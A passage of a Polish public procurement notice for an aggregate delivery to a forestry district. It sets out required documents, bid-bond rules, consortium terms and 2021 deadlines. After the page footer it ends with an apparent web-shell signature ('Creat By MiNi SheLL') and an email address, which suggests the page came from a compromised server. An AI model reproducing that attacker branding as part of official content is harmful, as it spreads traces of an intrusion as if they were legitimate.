wykluczenia, Zamawiający żąda,<br/>aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym<br/>podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w<br/>postępowaniu.<br/>Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub<br/>sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w<br/>danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>V. Oceniając zdolność techniczną lub zawodową Wykonawcy, Zamawiający działając na<br/>podstawie art. 116 ust. 2 PZP w zw. z art. 266 PZP może, na każdym etapie postępowania,<br/>uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę<br/>sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć<br/>negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia braku podstaw do wykluczenia z postępowania, o<br/>których mowa w pkt 6.1. i 6.3. SWZ oraz w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu, o których mowa w pkt 7.1. SWZ wykonawca składa wraz z ofertą oświadczenia, o<br/>których mowa w art. 125 ust. 1 PZP, tj.:<br/>a) oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, sporządzone zgodnie ze<br/>wzorem stanowiącym załącznik nr 3A do SWZ oraz<br/>b) oświadczenie Wykonawcy o braku podstaw do wykluczenia, sporządzone zgodne ze wzorem<br/>stanowiącym załącznik nr 3B do SWZ.<br/>Oświadczenia, o których mowa wyżej stanowią dowód potwierdzający brak podstaw wykluczenia oraz<br/>spełnienie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący<br/>wymagane przez Zamawiającego podmiotowe środki dowodowe. Oświadczenia te składa się, pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.<br/>2. W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 7.1. SWZ<br/>Zamawiający działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość<br/>posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem. Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć<br/>wymaganych przez Zamawiającego podmiotowych środków dowodowych, o których mowa w pkt 9.2.<br/>lit. a) SWZ, Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób<br/>potwierdzają spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu<br/>dotyczącego sytuacji ekonomicznej lub finansowej.<br/>b) wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości brutto, przedmiotu (rodzaju wykonanych dostaw), dat wykonania (dat dziennych rozpoczęcia i zakończenia realizacji) i podmiotów, na rzecz których dostawy zostały<br/>wykonane (wzór wykazu wykonanych dostaw stanowi załącznik nr 7 do SWZ). Jeżeli Wykonawca<br/>powołuje się na doświadczenie w realizacji dostaw wykonywanych wspólnie z innymi Wykonawcami<br/>wykaz, o którym mowa wyżej dotyczy dostaw, w których wykonaniu Wykonawca ten bezpośrednio<br/>uczestniczył. Okres wyrażony w latach, o którym mowa wyżej, liczy się wstecz od dnia w którym upływa<br/>termin składnia ofert.<br/>c) dowodów określających, że wskazane przez Wykonawcę dostawy na potwierdzenie spełnienia<br/>warunku udziału w postępowaniu dot. zdolności technicznej lub zawodowej w zakresie doświadczenia<br/>zostały wykonane należycie.<br/>Dowodami, o których mowa wyżej, są referencje bądź inne dokumenty sporządzone przez podmiot, na<br/>rzecz którego dostawy zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>3. Więcej informacji w rozdziale 9 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 6.1. i 6.3. SWZ Zamaw.<br/>dział.na podst.art. 274 ust. 1 PZP wezwie Wykon., którego oferta została najwyżej oceniona, do<br/>złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień<br/>złożenia następujących podm.śr.dow.:<br/>a) infor.z KRK w zakresie:(a) art. 108 ust. 1 pkt 1) i 2) PZP, (b) art. 108 ust. 1 pkt 4) PZP, dot.orzeczenia<br/>zakazu ubieg.się o zam.publ. tyt. środka karnego – sporządzonej nie wcześniej niż 6 m-cy przed jej<br/>złożeniem;<br/>b) oświad.Wykon., w zakresie art. 108 ust. 1 pkt 5) PZP, o braku przynależności do tej samej gr.kapit.,<br/>w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów z innym Wykon., który<br/>złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie<br/>art. 108 ust. 1 pkt 5) PZP o przynależności lub braku przynależności do tej samej grupy kapitałowej<br/>stanowi załącznik nr 6 do SWZ);<br/>c) zaświad.właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z<br/>opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawionego nie wcześniej niż 3<br/>miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków lub opłat wraz z zaświadczeniem, Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem<br/>terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami<br/>lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>d) zaświad.albo innego dokumentu właściwej terenowej jednostki organizacyjnej ZUS lub właściwego<br/>oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i<br/>zdrowotne, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawionego nie wcześniej niż 3 miesiące przed jego<br/>złożeniem, a w przypadku zalegania z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne<br/>wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów<br/>potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych<br/>składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł<br/>wiążące porozumienie w sprawie spłat tych należności;<br/>e) odpisu lub informacji z KRS lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem,<br/>jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>f) oświad.Wykon.o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1<br/>PZP (oświadczenie Wykonawcy o braku podstaw do wykluczenia, sporządzone wg załącznika nr 3B do<br/>SWZ), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których<br/>mowa w: a) art. 108 ust. 1 pkt 3) PZP, b) art. 108 ust. 1 pkt 4) PZP, dotyczących orzeczenia zakazu<br/>ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, c) art. 108 ust. 1 pkt 5) PZP,<br/>dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6) PZP, e) art. 109 ust. 1 pkt 1) PZP, odnośnie do naruszenia obowiązków<br/>dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r.<br/>o podatkach i opłatach lokalnych (tekst jedn. Dz. U. z 2019 r., poz. 1170 z późn. zm.), f) art. 109 ust. 8 i<br/>10 PZP - (wzór oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 PZP w zakresie podstaw wykluczenia z postępowania stanowi załącznik nr 8 do<br/>SWZ).<br/>Więcej informacji w rozdziale 9 SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków<br/>dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert określonym w pkt 14.1. SWZ Wykonawca zobowiązany jest złożyć<br/>Zamawiającemu Ofertę zawierającą:<br/>a) formularz Oferty sporządzony wg wzoru stanowiącego załącznik nr 1 do SWZ pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym,<br/>b) oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi odpowiednio załącznik nr 3A i<br/>załącznik 3B do SWZ, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób<br/>upoważnionych do reprezentacji podmiotu składającego oświadczenie, złożone przez:<br/>- Wykonawcę,<br/>- Wykonawców wspólnie ubiegających się o udzielenie zamówienia (o ile wykonawcy wspólnie<br/>ubiegają się o udzielenie zamówienia);<br/>c) oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi odpowiednio załącznik nr 3C i<br/>załącznik 3D do SWZ, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób<br/>upoważnionych do reprezentacji podmiotu udostępniającego Wykonawcy zasoby na zasadzie<br/>określonej w art. 118 PZP, o ile dotyczy,<br/>d) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów zgodnie z pkt 9.4. SWZ, jeżeli Wykonawca wykazując spełnienie<br/>warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów;<br/>(Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby wykonania zamówienia stanowi załącznik nr 5 do SWZ),<br/>e) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby na zasadach<br/>określonych w art. 118 PZP, jest umocowana do jego reprezentowania. Wykonawca nie jest<br/>zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>Wykonawca dostarczy dane umożliwiające dostęp do tych dokumentów,<br/>f) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia lub osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP, jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia lub podmiotu udostępniającego zasoby na zasadach określonych w<br/>art. 118 PZP - działa osoba, której umocowanie do jego reprezentowania nie wynika z<br/>dokumentów, o których mowa w pkt 13.4. lit e) SWZ, sporządzone w sposób określony w pkt<br/>9.13.-9.22 SWZ,<br/>g) wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem<br/>elektronicznym osób upoważnionych do jego wystawienia (tylko, gdy Wykonawca wnosi wadium<br/>w formie niepieniężnej).<br/>Szczegółowe informacje zawiera rozdział 9 i 13 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości: 2 000,00 zł (słownie złotych: dwa<br/>tysiące 00/100 PLN).<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2) i 3) oraz ust. 2 PZP.<br/>2. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.:<br/>Dz. U. z 2020 r., poz. 299).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego prowadzony w Banku Ochrony Środowiska S.A., nr rachunku: 49 1540 1030<br/>2001 7702 4918 0001 z dopiskiem: wadium na zabezpieczenie oferty w postępowaniu „Dostawa<br/>kruszyw – Nadleśnictwo Poddębice, Leśnictwo Niemysłów”. Wniesienie wadium w pieniądzu<br/>będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym<br/>Zamawiającego. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku<br/>bankowym.<br/>4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub<br/>poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać<br/>bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie<br/>związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4)<br/>SWZ należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj.<br/>opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego<br/>wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta<br/>Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie<br/>będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek<br/>o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3) PZP zostanie odrzucona z<br/>postępowania na podstawie art. 226 ust. 1 pkt 14) PZP w zw. z art. 266 PZP.<br/>6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz<br/>wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie<br/>przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty<br/>gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach<br/>określonych w art. 98 ust. 6 PZP.<br/>7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> I. W przypadku oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać<br/>umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa<br/>załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) Oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. oświadczenie Wykonawcy o<br/>spełnieniu warunków udziału w postępowaniu (wg wzoru stanowiącego załącznik nr 3A do SWZ)<br/>oraz oświadczenie Wykonawcy o braku podstaw do wykluczenia (wg wzoru stanowiącego<br/>załącznik nr 3B do SWZ) składa każdy z Wykonawców. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenia<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa wyżej<br/>powinny zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 9.3. SWZ obowiązany będzie złożyć każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy i wniesienie zabezpieczenia należytego<br/>wykonania umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie<br/>Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania<br/>poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w<br/>całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia łącznie lub każdego z osobna.<br/>II. W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia<br/>dot. oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum)<br/>stosuje się odpowiednio, z zastrzeżeniem, że do odpowiedzi na wezwanie Zamawiającego do<br/>złożenia dokumentów, o którym mowa w pkt 9.3. SWZ należy załączyć (1) zaświadczenia<br/>właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z<br/>opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawionego nie wcześniej<br/>niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków lub opłat<br/>wraz z zaświadczeniem, Zamawiający żąda złożenia dokumentów potwierdzających, że przed<br/>upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat<br/>wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności, oraz (2) zaświadczenia albo innego dokumentu właściwej terenowej jednostki<br/>organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego,<br/>że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w<br/>zakresie art. 109 ust. 1 pkt 1) PZP, wystawionego nie wcześniej niż 3 miesiące przed jego<br/>złożeniem, a w przypadku zalegania z opłaceniem składek na ubezpieczenie społeczne lub<br/>zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia<br/>dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał<br/>płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności - odrębnie dla<br/>każdego ze wspólników oraz odrębnie dla spółki. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego zawiera projekt umowy<br/>stanowiący załącznik nr 4 do SWZ.<br/>Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje<br/>możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności w niej<br/>wymienionych z uwzględnieniem podanych we wzorze umowy warunków ich wprowadzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-07 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy przetargowej https://zulwroclaw.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-07 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-05</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com